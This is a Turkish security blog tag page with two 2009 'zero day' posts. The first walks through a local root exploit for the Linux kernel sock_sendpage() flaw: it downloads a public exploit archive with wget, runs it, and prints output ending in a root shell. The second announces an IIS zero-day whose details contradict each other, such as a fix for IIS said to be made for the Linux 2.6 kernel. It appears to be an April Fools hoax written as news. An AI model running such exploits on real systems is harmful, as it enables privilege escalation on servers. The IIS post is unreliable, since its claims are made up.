Posts Tagged ‘ Zero Day

Linux Kernel Yamalama Zamanı ve Root Olun..

Linux kernel 2.4.X ve 2.6.X sürümlerini etkileyen sifir gun acigi yayinlandi(Linux Kernel ’sock_sendpage()’ NULL Pointer Dereference Vulnerability). Özellikle sunucularında shell hesapları veren sistem adminlerinin bu açığı gidermeleri en acilinden gerekmekte..

http://www.securityfocus.com/bid/36038/info da data detaylı bilgi bulabilirsiniz!!!

Huzeyfe Onal ın yaptığı test
Exploit kullanmadan onceki kullanici haklari.
$ id
uid=1001(huzeyfe) gid=1001(huzeyfe) groups=1001(huzeyfe)

Exploitin kullanimi

# wget http://www.grsecurity.net/~spender/exploitx.tgz
huzeyfe@guvenlis:/tmp$ cd exploitx
huzeyfe@guvenlis:/tmp/exploitx$ ls
exploit.c pwnkernel.c tzameti.avi wunderbar_emporium.sh
huzeyfe@guvenlikod:/tmp/wunderbar_emporium$ ./exploitx.sh
[+] Personality set to: PER_SVR4
E: x11wrap.c: XOpenDisplay() failed
E: module.c: Failed to load module “module-x11-publish” (argument: “”): initialization failed.
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xc05b4b7c
[+] Resolved selinux_enabled to 0xc05b4b78
[+] Resolved apparmor_enabled to 0xc04798a4
[+] Resolved apparmor_complain to 0xc05b6770
[+] Resolved apparmor_audit to 0xc05b6778
[+] Resolved apparmor_logsyscall to 0xc05b677c
[+] Resolved security_ops to 0xc05b3324
[+] Resolved default_security_ops to 0xc0478640
[+] Resolved sel_read_enforce to 0xc021fa60
[+] Resolved audit_enabled to 0xc0574544
[+] got ring0!
[+] detected 2.6 style 8k stacks
[+] Disabled security of : LSM
[+] Got root!
#
# id
uid=0(root) gid=0(root) groups=1001(huzeyfe)

2009
08/18
DİZİN
Genel
TAGS

Yorum yazın

IIS'de Zero Day Açığı

Microsoft IIS web sunucusunda, sistemde komut çalıştırılmasına izin veren yeni bir “Sıfır Gün” güvenlik açığı yayınlandı. Henüz Microsoft tarafından güvenlik açığı doğrulanmadı ve bu nedenle henüz yayınlanmış bir yama bulunmuyor. Açığın kullanımı için hazırlanmış olan “Exploit” kodu ise Metasploit Framework paketine eklendiği doğrulandı.

Açığın oluşmasına neden olan sorun, sistem çekirdeğindeki güvenlik uzantılarının HTTP/1.1 ile gelen HEAD isteklerindeki Cookie başlık bilgisini hatalı yorumlamasından kaynaklanıyor. Özel üretilmiş bir paket kullanılarak sistem çekirdeğinin döngüye sokulması ve donanım seviyesinde sisteme erişim sağlanması mümkün görünmektedir. Güvenlik açığı Windows 2000, 2003, 2008 ve Vista üzerinde çalışmakta olan IIS sürümlerini etkilemektedir.

Saldırı tespit ve önleme sistemi geliştiricilerinin de konu ile ilgili araştırma yaptıkları, ancak henüz önleyici bir kural seti güncellemesi yayınlanmadığını da hatırlatalım.

Henüz açıklamalar netleşmese de kurumların Microsoft IIS kullanılan web sunucularını kapatması gerektiği birçok uzman tarafından ifade edilmiştir. Ayrıca 1 Nisan itibariyle hazırlanan ve duyurulan üçüncü parti bir yama ile Microsoft IIS’in güvenlik açığının giderilmesi mümkün görünmektedir. Yamanın sistem çekirdeğinin 2.6 serisi için hazırlandığı dikkate alınmalıdır
Kaynak: Siyahsapka

2009
04/04
DİZİN
Alarm
TAGS

4 yorum